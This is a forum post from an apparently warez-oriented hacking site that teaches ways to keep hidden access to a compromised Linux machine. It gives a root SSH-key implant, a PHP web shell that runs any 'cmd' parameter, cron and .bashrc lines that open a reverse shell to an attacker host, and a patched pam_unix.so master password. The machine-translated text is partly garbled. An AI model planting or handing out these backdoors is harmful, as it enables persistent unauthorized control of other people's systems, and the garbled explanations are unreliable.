WGOD!

The general member portfolio consists of software developers, company owners and investors. Our mission is to ensure that all shared content is clean and functional. For this reason, unfortunately, not every member is accepted. Please do not attempt to register for 1 software or 1 theme, membership is paid. You can join our telegram group below or send an e-mail to [email protected] to purchase the invite code for 10$.

Join Telegram

Info

Konu Hakkında Merhaba, tarihinde #WMEDU kategorisinde MrSynox tarafından oluşturulan Linux Backdoors all the different techniques başlıklı konuyu okuyorsunuz. Bu konu şimdiye dek 472 kez görüntülenmiş, 1 yorum ve 0 tepki puanı almıştır...
Kategori Adı #WMEDU
Konu Başlığı Linux Backdoors all the different techniques
Thread starter MrSynox
Start date
Replies
Views
First message reaction score
Son Mesaj Yazan Magintosh

MrSynox

Guest
New
16
11
Warez Point
Turkish Liras
0₺
Offline
Linux Backdoors all the different techniques

SSH Backdoors
Ssh Backdoors use our ssh keys some people prefer for home use.
the user becomes root for the user with the highest privileges.

Let's generate an ssh key with ssh-keygen

1637867340891.png
We now have 2 keys. 1 key and 1 public key are there now in migration and public migration for /root/.ssh.
Disable public key renaming authorized_keys

Now login as root.

Note: This backdoor doesn't really count. The person in charge will notice.

PHP Backdoors
A Linux root will be older, large web root and or any sale from roots in use.

The web root is located at /var/www/html.

Code:
<? php
    if (isset ($ _ REQUEST ['cmd'])) {
        echo "<pre>". shell_exec ($ _ REQUEST ['cmd']). "</pre>";
    }
?>

This unit of code takes the "cmd" parameter and runs whatever is given that parameter.

Notice the "$_REQUEST ['cmd'])"; it means or means you can pass this parameter in GET POST data.

Suggest a few to hide it

You can add to an existing php extension

"with another outfit cmd parameter"

CronJob Backdoors
what is a cronjob
It is a business planner used in computer tools. Cron is used to plan software environments, for selections and dates, or to schedule work.

See /etc/cronjob files

1637867471045.png
Notice 2 letters: "m and h"

These are the letters whether the task should be run ten hours or one.

You can see that there is a "*" under the "h". This means that he will run the clock.

Add this to the cronjob extension

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker/port 0>&1'

Don't forget to listen on the port it specified

Note: This backdoor doesn't really count. The person in charge will notice.

.bashrc Backdoors
Bas as a staging environment, ".bashrc" in a staging main is prepared.

For ".bashrc" users to ".bashrc" files, you can run this command.

echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Your nc reader should always be ready for when your user will open it.

Note: we can say that this backdoor is hidden

pam_unix.so Backdoors
"Pam_unix.so" is one of the files responsible for authentication in Linux.
1637867592169.png
To verify the user password for the file "pam_ix.so", "unix_ify_password" can meet.
1637867616021.png

Did you see what I added?
"if (strcmp(p,"0xMitsurugi")! = 0)"
We are improving the "0xMitsurugi" test with the "p" in the screenshot.
It can be entered by "P", refers to the password by the user.

you can see "! = 0" at the end of the expression. It means "successful".
So IF setting "p" (user controlled) and "0xMitsurugi" are NOT the same... it will be used for "unix_verify_password".

If the string "p" (security by the user) and the string "0xMitsurugi" are the same, it confirms authentication. We mark success using "PAM_SUCCESS"

this backdoor consists of your own password "pam_file.so" file.

To download the password you added to the file, it can verify that you are authenticated with that password until the password is removed from "pam_unix.so".


There is a script that will do this automatically.
 
Guest
Help Users
  • No one is chatting at the moment.
  • aLeech:
    Guest wariclis has joined the room.
  • (Guest) wariclis:
    hi
    Quote
    (Guest) wariclis: hi
    Back
    Top